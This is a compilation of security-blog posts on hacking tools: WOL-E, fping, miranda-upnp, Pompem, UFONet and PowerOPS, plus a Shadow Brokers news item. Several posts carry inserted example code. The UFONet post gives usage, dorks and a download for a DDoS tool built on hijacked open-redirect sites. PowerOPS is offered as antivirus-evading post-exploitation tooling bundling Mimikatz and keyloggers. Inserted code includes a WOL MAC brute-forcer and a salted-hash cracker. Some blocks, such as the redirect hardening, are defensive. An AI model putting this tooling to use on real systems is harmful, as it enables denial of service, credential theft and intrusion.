Channel: Darknet – Hacking Tools, Hacker News & Cyber Security

WOL-E – Wake On LAN Security Testing Suite


WOL-E is a suite of tools for testing the security of the Wake on LAN (WOL) feature of network-attached computers; WOL is now enabled by default on many Apple computers.


This allows you to easily scan for Apple devices on a network (based on their MAC addresses).

Features

These tools include:

  • Bruteforcing the MAC address to wake up clients
  • Sniffing WOL attempts on the network and saving them to disk
  • Sniffing WOL passwords on the network and saving them to disk
  • Waking up single clients (post sniffing attack)
  • Scanning for Apple devices on the network for WOL enabling
  • Sending bulk WOL requests to all detected Apple clients

Usage

root@kali:~# wol-e -h

[*] WOL-E 1.0
[*] Wake on LAN Explorer - A collection a WOL tools.
[*] by Nathaniel Carew

    -m
        Waking up single computers.
        If a password is required use the -k 00:12:34:56:78:90 at the end of the above command.
        wol-e -m 00:12:34:56:78:90 -b 192.168.1.255 -p <port> -k <pass>
        Defaults:
        Port: 9
        Broadcast: 255.255.255.255
        Pass: empty

    -s
        Sniffing the network for WOL requests and passwords.
        All captured WOL requests will be displayed on screen and written to /usr/share/wol-e/WOLClients.txt.
        wol-e -s -i eth0

    -a
        Bruteforce powering on WOL clients.
        wol-e -a -p <port>
        Place the address ranges into the bfmac.lst that you wish to bruteforce.
        They should be in the following format:
        00:12:34:56
        Default port: 9

    -f
        Detecting Apple devices on the network for WOL enabling.
        This will output to the screen and write to /usr/share/wol-e/AppleTargets.txt for detected Apple MAC's.
        wol-e -f

    -fa
        Attempt to wake all detected Apple targets in /usr/share/wol-e/AppleTargets.txt.
        This will send a single WOL packet to each client in the list and tell you how many clients were attempted.
        wol-e -fa
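What the -m, -k, -s and -a switches above actually put on the wire is a "magic packet": six 0xFF bytes, the target MAC repeated sixteen times and, for SecureOn-capable NICs, a 4- or 6-byte password appended in the clear. The following is an added example, not WOL-E's own code: it builds and parses that packet, enumerates the 65,536 addresses behind a bfmac.lst prefix, and sends a single wake-up. Function names and the sample MAC/password values are assumptions.

```python
import socket

def parse_hex_bytes(text: str, lengths) -> bytes:
    """Turn '00:12:34:56:78:90' (or '00-12-...', '0012.3456.7890') into raw bytes."""
    raw = bytes.fromhex("".join(c for c in text if c not in ":-."))
    if len(raw) not in lengths:
        raise ValueError(f"expected one of {lengths} bytes, got {len(raw)}")
    return raw

def build_magic_packet(mac: str, secureon: str = "") -> bytes:
    """Magic packet: 6 x 0xFF, the target MAC repeated 16 times (102 bytes), then an
    optional 4- or 6-byte SecureOn password (what wol-e's -k switch appends)."""
    body = b"\xff" * 6 + parse_hex_bytes(mac, (6,)) * 16
    if secureon:
        body += parse_hex_bytes(secureon, (4, 6))
    return body

def parse_magic_packet(payload: bytes):
    """What a sniffer (wol-e -s) does with each UDP payload: returns (mac, password_hex)
    for a well-formed magic packet, or None. The password travels unencrypted, which is
    why it can be captured and replayed against the same host."""
    if len(payload) < 102 or payload[:6] != b"\xff" * 6:
        return None
    mac = payload[6:12]
    if payload[6:102] != mac * 16:
        return None
    password = payload[102:]
    if len(password) not in (0, 4, 6):
        return None
    return ":".join(f"{b:02x}" for b in mac), password.hex()

def bruteforce_macs(prefix: str):
    """The -a mode: for a 4-byte prefix such as '00:12:34:56' (the bfmac.lst format)
    yield every MAC in that range, 65,536 addresses."""
    base = parse_hex_bytes(prefix, (4,))
    for tail in range(0x10000):
        yield ":".join(f"{b:02x}" for b in base + tail.to_bytes(2, "big"))

def send_magic_packet(mac: str, broadcast: str = "255.255.255.255", port: int = 9, secureon: str = "") -> int:
    """Equivalent of `wol-e -m <mac> -b <broadcast> -p <port> -k <pass>`; returns bytes sent."""
    pkt = build_magic_packet(mac, secureon)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        return s.sendto(pkt, (broadcast, port))

if __name__ == "__main__":
    # Assumed addresses; wakes one host on the local /24 broadcast
    send_magic_packet("00:12:34:56:78:90", broadcast="192.168.1.255")
```

Because nothing in the packet is authenticated, the only defensive levers are the ones the tool's feature list implies: keep WOL off on hosts that do not need it, block UDP/9 and directed broadcasts at the edge, and treat a SecureOn password as a sniffable token rather than a secret.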

You can download WOL-E here:

wol-e_2.0.orig.tar.gz

Or read more here.

The post WOL-E – Wake On LAN Security Testing Suite appeared first on Darknet - The Darkside.


fping 3 – Multi Target ICMP Ping Tool


fping is a program like ping which uses the Internet Control Message Protocol (ICMP) echo request to determine if a target host is responding.


fping differs from ping in that you can specify any number of targets on the command line, or specify a file containing the lists of targets to ping. Instead of sending to one target until it times out or replies, fping will send out a ping packet and move on to the next target in a round-robin fashion. In the default mode, if a target replies, it is noted and removed from the list of targets to check; if a target does not respond within a certain time limit and/or retry limit it is designated as unreachable.

fping also supports sending a specified number of pings to a target, or looping indefinitely (as in ping). Unlike ping, fping is meant to be used in scripts, so its output is designed to be easy to parse.

The binary named fping6 is the same as fping, except that it uses IPv6 addresses instead of IPv4.

Usage

−a Show systems that are alive.
−A Display targets by address rather than DNS name.
−b n Number of bytes of ping data to send. The minimum size (normally 12) allows room for the data that fping needs to do its work (sequence number, timestamp). The reported received data size includes the IP header (normally 20 bytes) and ICMP header (8 bytes), so the minimum total size is 40 bytes. Default is 56, as in ping. Maximum is the theoretical maximum IP datagram size (64K), though most systems limit this to a smaller, system-dependent number.
−B n In the default mode, fping sends several requests to a target before giving up, waiting longer for a reply on each successive request. This parameter is the value by which the wait time is multiplied on each successive request; it must be entered as a floating-point number (x.y). The default is 1.5.
−c n Number of request packets to send to each target. In this mode, a line is displayed for each received response (this can be suppressed with −q or −Q). Also, statistics about responses for each target are displayed when all requests have been sent (or when interrupted).
−C n Similar to −c, but the per-target statistics are displayed in a format designed for automated response-time statistics gathering: one line per target listing the response time in milliseconds for each request, with "−" in place of any request that received no response.
−d Use DNS to lookup address of return ping packet. This allows you to give fping a list of IP addresses as input and print hostnames in the output.
−D Add Unix timestamps in front of output lines generated in looping or counting modes (−l, −c, or −C).
−e Show elapsed (round-trip) time of packets.
−f Read list of targets from a file. This option can only be used by the root user.
-g Generate a target list from a supplied IP netmask, or a starting and ending IP. Specify the netmask or start/end in the targets portion of the command line.
−h Print usage message.
−i n The minimum amount of time (in milliseconds) between sending a ping packet to any target (default is 25).
−l Loop sending packets to each target indefinitely. Can be interrupted with Ctrl-C; statistics about responses for each target are then displayed.
−m Send pings to each of a target host’s multiple interfaces.
−n Same as −d.
−p <n> In looping or counting modes (−l, −c, or −C), this parameter sets the time in milliseconds that fping waits between successive packets to an individual target. Default is 1000.
−q Quiet. Don’t show per-probe results, but only the final summary. Also don’t show ICMP error messages.
−Q n Like −q, but show summary results every n seconds.
−r n Retry limit (default 3). This is the number of times an attempt at pinging a target will be made, not including the first try.
−s Print cumulative statistics upon exit.
−S addr Set source address.
−I if Set the interface (requires SO_BINDTODEVICE support)
−t n Initial target timeout in milliseconds (default 500). In the default mode, this is the amount of time that fping waits for a response to its first request. Successive timeouts are multiplied by the backoff factor.
−T n Ignored (for compatibility with fping 2.4).
−u Show targets that are unreachable.
−O n Set the type of service flag (TOS). n can be either decimal or hexadecimal (0xh) format.
−v Print fping version information.
−H n Set the IP TTL field (time to live hops).
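Since the point of fping is to be driven from scripts, the useful thing to show is the parsing side. The block below is an added example, not part of fping: it parses the default per-target lines (with −e round-trip times), the −C per-probe lines, and computes how long a silent host costs under the −t/−B/−r defaults described above (500 ms, then 750, 1125 and 1687.5 ms for the three retries). The sample output lines are constructed, not captured from a real run.

```python
import re
import subprocess

# Constructed sample output. First block: fping's per-target lines, with -e adding the
# round-trip time. Second block: `fping -C 4 -q` statistics, '-' where a probe got no reply.
SAMPLE_DEFAULT = """\
192.168.1.1 is alive (0.41 ms)
192.168.1.7 is alive (12.3 ms)
192.168.1.9 is unreachable
"""
SAMPLE_C_MODE = """\
192.168.1.1 : 0.45 0.50 - 0.48
192.168.1.9 : - - - -
"""

ALIVE_RE = re.compile(r"^(\S+) is alive(?: \(([\d.]+) ms\))?$")
UNREACHABLE_RE = re.compile(r"^(\S+) is unreachable$")

def parse_default(output: str):
    """Returns ({alive_host: rtt_ms or None}, [unreachable hosts])."""
    alive, unreachable = {}, []
    for line in output.splitlines():
        line = line.strip()
        m = ALIVE_RE.match(line)
        if m:
            alive[m.group(1)] = float(m.group(2)) if m.group(2) else None
            continue
        m = UNREACHABLE_RE.match(line)
        if m:
            unreachable.append(m.group(1))
    return alive, unreachable

def parse_c_mode(output: str):
    """Returns {host: (probes_sent, replies, avg_rtt_ms or None)} from -C output."""
    stats = {}
    for line in output.splitlines():
        host, sep, times = line.partition(" : ")
        if not sep:
            continue
        samples = times.split()
        replies = [float(t) for t in samples if t != "-"]
        avg = round(sum(replies) / len(replies), 2) if replies else None
        stats[host.strip()] = (len(samples), len(replies), avg)
    return stats

def worst_case_wait_ms(timeout_ms: float = 500, backoff: float = 1.5, retries: int = 3) -> float:
    """Time spent on a host that never answers in default mode:
    -t for the first try, then -t * -B, -t * -B^2 ... for each of the -r retries."""
    return sum(timeout_ms * backoff ** k for k in range(retries + 1))

def sweep(targets, extra_args=()):
    """Run fping on a target list and parse it. The -c/-C statistics are printed on stderr,
    so both streams are merged before parsing."""
    cmd = ["fping", "-e", *extra_args, *targets]
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return parse_default(proc.stdout + proc.stderr)
```

The worst-case figure matters when sweeping a large, mostly empty range: with the defaults each dead address costs just over four seconds of wall-clock time, so lowering −r and −t (or raising −i only where the network tolerates it) is what turns a /16 sweep from hours into minutes.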

You can download fping 3 here:

fping-3.13.tar.gz

Or read more here.


miranda-upnp – Interactive UPnP Client


Miranda is a Python-based UPnP (Universal Plug and Play) client application designed to discover, query and interact with UPnP devices, particularly Internet Gateway Devices (IGDs, i.e. routers). It can be used to audit UPnP-enabled devices on a network for possible vulnerabilities.


Miranda was built on and for Linux and has been tested on a Linux 2.6 kernel with Python 2.5. Since it is written in Python, most functionality should be available on any platform Python supports. Miranda has been tested against IGDs from various vendors, including Linksys, D-Link, Belkin and ActionTec. All required Python modules came installed by default on a Linux Mint 5 (Ubuntu 8.04) test system.

Features

Some of its features include:

  • Interactive shell with tab completion and command history
  • Passive and active discovery of UPNP devices
  • Customizable MSEARCH queries (query for specific devices/services)
  • Full control over application settings such as IP addresses, ports and headers
  • Simple enumeration of UPNP devices, services, actions and variables
  • Correlation of input/output state variables with service actions
  • Ability to send actions to UPNP services/devices
  • Ability to save data to file for later analysis and collaboration
  • Command logging

Usage

root@kali:~# miranda -h

Command line usage: /usr/bin/miranda [OPTIONS]

    -s <struct file>    Load previous host data from struct file
    -l <log file>       Log user-supplied commands to log file
    -i <interface>      Specify the name of the interface to use (Linux only, requires root)
    -u          Disable show-uniq-hosts-only option
    -d          Enable debug mode
    -v          Enable verbose mode
    -h          Show help
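The "active discovery" and "customizable MSEARCH queries" features boil down to one SSDP exchange: a multicast M-SEARCH to 239.255.255.250:1900 and unicast HTTP-style replies whose LOCATION header points at the device description XML. The block below is an added example, not Miranda's code: it builds the M-SEARCH, parses a reply (or a passive NOTIFY), and refuses to follow a LOCATION that does not point back at the responder, since a rogue host on the LAN can otherwise steer an auditing tool to any URL. The sample response is constructed; names are assumptions.

```python
import socket
from urllib.parse import urlsplit

SSDP_ADDR, SSDP_PORT = "239.255.255.250", 1900

def build_msearch(st: str = "upnp:rootdevice", mx: int = 2) -> bytes:
    """Active discovery request; ST and MX are the fields Miranda lets you customise."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        f"HOST: {SSDP_ADDR}:{SSDP_PORT}",
        'MAN: "ssdp:discover"',
        f"MX: {mx}",
        f"ST: {st}",
        "", "",
    ]
    return "\r\n".join(lines).encode()

def parse_ssdp(message: bytes):
    """Split an SSDP message (M-SEARCH, its 200 OK reply, or a NOTIFY) into
    (start line, {lower-case header: value})."""
    head = message.decode("utf-8", errors="replace").partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def device_summary(message: bytes):
    """Fields an auditor cares about, or None if the message is not a device announcement."""
    start, h = parse_ssdp(message)
    if not (start.startswith("HTTP/1.1 200") or start.startswith("NOTIFY")):
        return None
    return {
        "location": h.get("location"),
        "st": h.get("st") or h.get("nt"),   # NOTIFY uses NT instead of ST
        "usn": h.get("usn"),
        "server": h.get("server"),
    }

def location_matches_sender(info: dict, sender_ip: str) -> bool:
    """Only fetch the description XML if LOCATION points at the host that answered."""
    return urlsplit(info.get("location") or "").hostname == sender_ip

def discover(st: str = "upnp:rootdevice", mx: int = 2):
    """Multicast the M-SEARCH and collect replies until MX+1 seconds pass."""
    found = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
        s.settimeout(mx + 1)
        s.sendto(build_msearch(st, mx), (SSDP_ADDR, SSDP_PORT))
        try:
            while True:
                data, addr = s.recvfrom(65507)
                info = device_summary(data)
                if info and location_matches_sender(info, addr[0]):
                    found.append({"ip": addr[0], **info})
        except socket.timeout:
            pass
    return found

# Constructed sample reply, not captured from a real device
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"LOCATION: http://192.168.1.1:1900/rootDesc.xml\r\n"
    b"SERVER: Linux/2.6 UPnP/1.0 IGD/1.0\r\n"
    b"ST: upnp:rootdevice\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000001::upnp:rootdevice\r\n"
    b"EXT:\r\n\r\n"
)
```

Passive discovery is the same parser applied to the NOTIFY messages devices multicast on their own; the SERVER header is usually the quickest fingerprint of the embedded HTTP stack when deciding which IGD to audit further.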

You can download miranda-upnp here:

miranda-upnp-master.zip

Or read more here.


Pompem – Exploit & Vulnerability Finder


Pompem is an open source exploit and vulnerability finder, designed to automate the search for exploits and vulnerabilities in the most important databases. Developed in Python, it has an advanced search system that helps the work of pen-testers and ethical hackers.


In the current version it searches PacketStorm Security, CXSecurity, ZeroDay, Vulners, the National Vulnerability Database and the WPScan Vulnerability Database.

Usage

To get the list of basic options and information about the project:

$ python3.5 pompem.py -h

Options:
  -h, --help                      show this help message and exit
  -s, --search <keyword,keyword,keyword>  text for search
  --txt                           Write txt File
  --html                          Write html File

Examples of use:

$ python3.5 pompem.py -s Wordpress
$ python3.5 pompem.py -s Joomla --html
$ python3.5 pompem.py -s "Internet Explorer,joomla,wordpress" --html
$ python3.5 pompem.py -s FortiGate --txt
$ python3.5 pompem.py -s ssh,ftp,mysql

You can download Pompem here:

Pompem-v0.2.0.zip

Or read more here.


UFONet – Open Redirect DDoS Tool


UFONet is an open redirect DDoS tool designed to launch attacks against a target by using insecure redirects in third-party web applications as a botnet. Obviously, only for testing purposes.


The tool abuses OSI layer 7 (HTTP) to create and manage 'zombies' and to conduct different attacks using GET/POST, multi-threading, proxies, origin spoofing methods, cache evasion techniques, etc.

Definition of an “Open Redirect”:

An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.

From: CWE-601: URL Redirection to Untrusted Site (‘Open Redirect’)
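A 'zombie' in UFONet's sense is simply a site whose redirect or proxy endpoint takes an attacker-chosen URL and acts on it. The block below is an added example, not UFONet's code and not from the CWE entry: the flawed handler that makes a site usable as a zombie, next to a hardened version that accepts only a same-site path or an allowlisted host and rejects the usual bypasses (scheme-relative `//evil`, backslash variants, `user@host` tricks, non-http schemes and header injection). Function names and the allowlist are assumptions.

```python
from urllib.parse import urlsplit, urlunsplit

def unsafe_redirect_target(next_param: str) -> str:
    """CWE-601 as found in the wild: whatever arrives in ?url= becomes the Location header."""
    return next_param

def safe_redirect_target(next_param: str, allowed_hosts, default: str = "/") -> str:
    """Accept only a same-site path or an http(s) URL whose host is on the allowlist;
    anything else falls back to `default`."""
    if not next_param or "\r" in next_param or "\n" in next_param:   # header injection
        return default
    candidate = next_param.replace("\\", "/")       # browsers treat '\' as '/', so '/\evil' == '//evil'
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return default                               # javascript:, data:, ...
    if not parts.scheme and not parts.netloc:
        # path-relative: exactly one leading slash ('//evil' parses with a netloc, so never lands here)
        return candidate if candidate.startswith("/") and not candidate.startswith("//") else default
    host = (parts.hostname or "").lower()
    if host not in {h.lower() for h in allowed_hosts}:
        return default                               # also rejects 'https://target@evil/' and 'http:evil'
    return urlunsplit(parts)
```

The 'Wanna check if they are valid zombies?' step in the tool's workflow is the offensive mirror of this function: it sends the target's URL through each candidate endpoint and keeps the ones that behave like `unsafe_redirect_target`. Shipping the hardened form (or dropping the parameter in favour of an opaque identifier looked up server-side) is what removes a site from that pool.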

Usage

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -v, --verbose         active verbose on requests
  --update              check for latest stable version
  --check-tor           check to see if Tor is used properly
  --force-yes           set 'YES' to all questions
  --disableisup         disable external check of target's status
  --gui                 run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY       Use proxy server (tor: 'http://127.0.0.1:8118')
    --user-agent=AGENT  Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER   Use another HTTP Referer header (default SPOOFED)
    --host=HOST         Use another HTTP Host header (default NONE)
    --xforw             Set your HTTP X-Forwarded-For with random IP values
    --xclient           Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT   Select your timeout (default 10)
    --retries=RETRIES   Retries when the connection timeouts (default 1)
    --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY       Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS          Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS    Set max number of results for engine (default 10)
    --se=ENGINE         Search engine to use for 'dorking' (default: duck)
    --sa                Search massively using all search engines

  *Test Botnet*:
    -t TEST             Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me         Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies  Download 'zombies' from Community server: Turina
    --upload-zombies    Upload your 'zombies' to Community server: Turina
    --blackhole         Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP        Upload your 'zombies' to a 'blackhole'
    --down-from=DIP     Download your 'zombies' from a 'blackhole'

  *Research Target*:
    -i INSPECT          Search for biggest file (ex: -i 'http://target.com')

  *Configure Attack(s)*:
    --disable-aliens    Disable 'aliens' web abuse of test services
    --disable-isup      Disable check status 'is target up?'
    -r ROUNDS           Set number of rounds (default: 1)
    -b PLACE            Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET           Start Web DDoS attack (ex: -a 'http(s)://target.com')

Searching for ‘Zombies’

UFONet can dig on different search engines results to find possible ‘Open Redirect’ vulnerable sites. A common query string should be like this:

'proxy.php?url='
'check.cgi?url='
'checklink?uri='
'validator?uri='

For example you can begin a search with:

./ufonet -s 'proxy.php?url='

Or providing a list of “dorks” from a file:

./ufonet --sd 'dorks.txt'

By default UFONet uses a search engine called 'duck', but you can choose a different one:

./ufonet -s 'proxy.php?url=' --se 'bing'

This is the list of available search engines, with the last time each was confirmed working:

- duck [07/10/2015: OK!]
- google [07/10/2015: OK!]
- bing [07/10/2015: OK!]
- yahoo [07/10/2015: OK!]
- yandex [07/10/2015: OK!]

You can also search massively using all search engines supported:

./ufonet -s 'proxy.php?url=' --sa

To control how many 'zombies' are retrieved from the search engines you can use:

./ufonet --sd 'dorks.txt' --sa --sn 20

At the end of the process, you will be asked if you want to check the retrieved list to see if the URLs are vulnerable.

Wanna check if they are valid zombies? (Y/n)

Also, you will be asked to update the list adding automatically only ‘vulnerable’ web apps.

Wanna update your list (Y/n)

If you reply ‘Y’ your new ‘zombies’ will be appended to the file named: zombies.txt

Examples:

+ with verbose:     ./ufonet -s 'proxy.php?url=' -v
+ with threads:     ./ufonet --sd 'dorks.txt' --sa --threads 100

You can download UFOnet here:

git clone https://github.com/epsylon/ufonet

Or read more here.


Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities


Right now there's a ton of people talking about the NSA hack: the severity, the repercussions and the value of what has been leaked. The 0-day exploits in the cache of stolen data don't seem to be particularly recent, as they appear to date from 2013.


But even so, some of them haven’t been patched as both Cisco and Fortinet have warned customers about the vulnerabilities revealed in the data posted by Shadow Brokers.

A group calling itself the Shadow Brokers has started an online auction for top-of-the-range tools it claims were stolen from the Equation Group, a digital attack squad linked to the NSA.

The Shadow Brokers posted up news of the auction saying (in broken English) that they had been monitoring the Equation Group’s servers, had stolen the advanced hacking tools, and will auction them off to the highest bidder. The group said that if it gets Bitcoins worth $1m they will release the tools for free to everyone.

“We want make sure Wealthy Elite recognizes the danger cyber weapons, this message, our auction, poses to their wealth and control. Let us spell out for Elites. Your wealth and control depends on electronic data,” the group said [the link has since been taken down].

“You see what ‘Equation Group’ can do. You see what cryptolockers and stuxnet can do. You see free files we give for free. You see attacks on banks and SWIFT in news. Maybe there is Equation Group version of cryptolocker+stuxnet for banks and financial systems?”

Claims about stuff like this for sale online are often fake, so to prove their case the team posted sample code, which it says is around 40 per cent of the total, online. Postings on Github and other download sites have since been taken down, but not before some people got copies.


Now it seems the NSA wasn't hacked directly, but via a group called the Equation Group, which is believed to be an offensive cyber-operations arm of the NSA.

Even so, it brings up some well debated issues about the NSA reporting zero-day flaws to vendors rather than hoarding them (which the White House promised they would stop doing).

A preliminary analysis shows the revealed list seems to be focusing on router flaws, some of them quite old. Some files also share names with exploits listed in the NSA’s Tailored Access Operations hacking team’s catalogue for agents, revealed in 2013 by Edward Snowden.

Kaspersky, who first linked the Equation Group to the NSA, said it was analyzing the files but had no clue as to their veracity as yet. But Timo Steffens, a member of the German CERT-Bund team, is taking a skeptical line, although he acknowledged that if this is a fake, the scammers had put in a lot of effort.

Initial analysis by the likes of Kaspersky Labs, NSA whistleblower Edward Snowden, and a host of independent security researchers shore up claims by a hacking group calling itself Shadow Brokers that the exploits and toolsets it hopes to auction for millions of dollars in Bitcoins are legitimate Equation group weaponry.

Kaspersky Labs last year revealed the Equation group to be almost certainly a state-sponsored actor and, according to deep analysis of its activities, highly likely to be a wing of the National Security Agency given a series of very striking operational and technical similarities.

The Shadow Brokers group seems likely to originate from Russia, so this is possibly a nation state vs nation state attack at the highest levels of each country's intelligence agencies.

It's an interesting story that is creating a lot of news and drama. It's a tough call for the NSA, which has to maintain its attack capabilities against Russia and China while also balancing the health of American commerce and the safety of everyone using equipment from those vendors.

Source: The Register


PowerOPS – PowerShell Runspace Portable Post Exploitation Tool


PowerOPS is a PowerShell runspace portable post-exploitation tool aimed at making penetration testing with PowerShell "easier". It is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a PowerShell runspace environment (.NET). It intends to include multiple offensive PowerShell modules to make post-exploitation easier.


It tries to follow the KISS principle, being as simple as possible. The main goal is to make it easy to use PowerShell offensively and to help evade antivirus and other mitigation solutions. It does this in two ways:

  1. It doesn't rely on powershell.exe; it calls PowerShell directly through the .NET framework, which might help bypass security controls such as GPO, SRP and AppLocker that key on the powershell.exe host. Controls built into the PowerShell engine itself (AMSI and script block logging in PowerShell 5+) hook System.Management.Automation rather than the host process, so they still apply to a custom runspace.
  2. The payloads are executed from memory and never touch disk, evading most antivirus engines.

Since PowerOPS offers basically an interactive PowerShell command prompt you are free to use the PowerShell tools included the way you want, and additionally execute any valid PowerShell command.

What’s Inside The Runspace

  • PowerShellMafia/Powersploit
    • Get-Keystrokes
    • Invoke-DllInjection
    • Invoke-Mimikatz
    • Invoke-NinjaCopy
    • Invoke-Shellcode
    • Invoke-ReflectivePEInjection
    • Invoke-TokenManipulation
    • Invoke-WMICommand
    • PowerUp
    • PowerView
  • Nishang
    • Get-Information
    • Get-PassHashes
    • Port-Scan
  • Auto-GPPPassword
  • PowerCat
  • Empire
    • Invoke-Psexec
    • Invoke-SSHCommand
  • mimikittenz
  • SMBAutoBrute
  • PowerUpSQL

Additionally you can run any valid PowerShell command.


Powershell functions within the Runspace are loaded in memory from Base64 Encoded Strings.

Usage

Just run the binary and type ‘show’ to list available modules.

PS > show

[-] This computer is not part of a Domain! Some functions will not work!

[+] Nishang

 Get-Information    Get-PassHashes             Port-Scan

[+] PowerSploit

 Get-KeyStrokes     Invoke-DllInjection        Invoke-Mimikatz     Invoke-NinjaCopy
 Invoke-Shellcode   Invoke-TokenManipulation   Invoke-WmiCommand   Invoke-ReflectivePEInjection
 PowerView          PowerUp

[+] Empire

 Invoke-PsExec      Invoke-SSHCommand

[+] Others

 Auto-GPPPassword   Invoke-SMBAutoBrute        Invoke-mimikittenz  PowerCat
 PowerUpSQL

PS >

You can download PowerOPS here:

PowerOPS-v1.0-beta.zip

Or read more here.


IGHASHGPU – GPU Based Hash Cracking – SHA1, MD5 & MD4


IGHASHGPU is an efficient and comprehensive command line GPU based hash cracking program that enables you to retrieve SHA1, MD5 and MD4 hashes by utilising ATI and nVidia GPUs.


It even works with salted hashes, making it useful for MS-SQL, Oracle 11g, NTLM passwords and others that use salts.

IGHASHGPU is meant to run on ATI RV7X0 and RV8X0 cards, as well as any nVidia CUDA video card, with speed varying according to the user's GPU. The program also features a -cpudontcare switch that tells IGHASHGPU to use the GPU to the maximum without any regard for CPU usage.

You can also set a temperature threshold for hardware monitoring (-hm), so that cracking stops when the card goes over the permitted value (the default is 90 degrees Celsius).

A block-size option lets you trade display responsiveness against throughput: a smaller block reduces video lag, while a larger one offloads more passwords to the GPU per batch (IGHASHGPU supports block sizes from 16 to 23).

Hashes Supported for Cracking

As IGHASHGPU supports salted hashes it’s possible to use it for:

  • Plain MD4, MD5, SHA1.
  • NTLM
  • Domain Cached Credentials
  • Oracle 11g
  • MySQL5
  • MSSQL
  • vBulletin
  • Invision Power Board

Supported Cards/Requirements

  • Only currently supported ATI cards are:
    • HD RV7X0
    • RV830/870
    • 4550
    • 4670
    • 4830
    • 4730
    • 4770
    • 4850
    • 4870
    • 4890
    • 5750
    • 5770
    • 5850
    • 5870
  • Catalyst 9.9+ must be installed.
  • Only supported nVidia cards are the ones with CUDA support, i.e. G80+.
  • Systems with multiple GPUs supported.

Usage

ighashgpu.exe [switch:param] [hashfile.txt]

-c [csdepa]       Charset definition (caps, smalls (default), digits, special, space, all)
-u [chars]        User-defined characters
-uh [HEX]         User-defined characters in HEX (2 chars each)
-uhh [HEX]        User-defined characters in Unicode HEX (4 chars each)
-uf [filename]    Load characters from file. Not used with Unicode.
-sf [password]    Password to start attack from
-m [mask]         Password mask
-ms [symbol]      Mask symbol
-salt [hex]       Append salt after password
-asalt [string]   Append salt in ASCII after password
-usalt [string]   Append salt in Unicode after password
-ulsalt [string]  Same as above, but the Unicode string is first transformed to lower case
-min [value]      Minimum length (default == 4), must be >= 4
-max [value]      Maximum length (default == 6), must be <= 31 (not counting salt length)
-h [hash]         Hash to attack (16 or 20 bytes in HEX)
-t [type]         Type of hash to attack
-devicemask:[N]   Bit mask for GPU usage, bit 0 == first GPU (default 0xFF, i.e. all GPUs)
-cpudontcare      Tell ighashgpu that you want the maximum from the GPU and don't care about CPU usage at all (this means one CPU core at 100% per GPU)
-hm [N]           Set threshold temperature for hardware monitoring, default is 90C. You can disable monitoring by setting this value to zero.
-blocksize [N]    Set block size; by default N = 23, which means 2^23 = 8388608 passwords offloaded to the GPU in a single batch.

By default the charset is processed as ANSI (i.e. WideCharToMultiByte(CP_ACP, ...)). You can change this with:

-unicode          Use Unicode
-oem              Use OEM encoding
-codepage [page]  Convert charset to a specific codepage (which must of course be present on the system)
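The -salt/-asalt/-usalt switches all describe one layout, hash(encode(password) || salt), differing only in how the password is encoded before hashing. The block below is an added example, not IGHASHGPU's code: a CPU walk over a mask keyspace against that layout, plus helpers that split two of the listed formats (Oracle 11g "S:" and MSSQL 2005) into the hash and salt values you would pass as -h and -salt. The mask placeholders (?d, ?l, ?u), function names and sample salts are assumptions; MD4-based formats are left out because hashlib may not expose MD4 on recent OpenSSL builds.

```python
import hashlib
import itertools

# Mask placeholders for the example (constructed; not the tool's own -m/-ms syntax)
CHARSETS = {"?d": "0123456789", "?l": "abcdefghijklmnopqrstuvwxyz", "?u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ"}

def expand_mask(mask: str):
    """'sec?d?d?d' -> ['s', 'e', 'c', '0123456789', '0123456789', '0123456789']."""
    positions, i = [], 0
    while i < len(mask):
        if mask[i:i + 2] in CHARSETS:
            positions.append(CHARSETS[mask[i:i + 2]])
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions

def candidate_digest(password: str, salt: bytes, unicode_pw: bool = False, algo: str = "sha1") -> str:
    """hash(encode(password) || salt): the layout behind -salt/-asalt (8-bit password)
    and -usalt (UTF-16LE password, which is what the Windows and MSSQL formats hash)."""
    pw = password.encode("utf-16-le") if unicode_pw else password.encode("latin-1")
    return hashlib.new(algo, pw + salt).hexdigest()

def crack(target_hex: str, salt: bytes, mask: str, unicode_pw: bool = False, algo: str = "sha1"):
    """Walk the mask keyspace; the GPU does the same, 2^blocksize candidates per batch."""
    target = target_hex.lower()
    for combo in itertools.product(*expand_mask(mask)):
        pw = "".join(combo)
        if candidate_digest(pw, salt, unicode_pw, algo) == target:
            return pw
    return None

def make_oracle11g(password: str, salt: bytes) -> str:
    """Oracle 11g 'S:' hash: SHA1(password || 10-byte salt), stored as S:<40 hex hash><20 hex salt>."""
    if len(salt) != 10:
        raise ValueError("Oracle 11g uses a 10-byte salt")
    return "S:" + candidate_digest(password, salt).upper() + salt.hex().upper()
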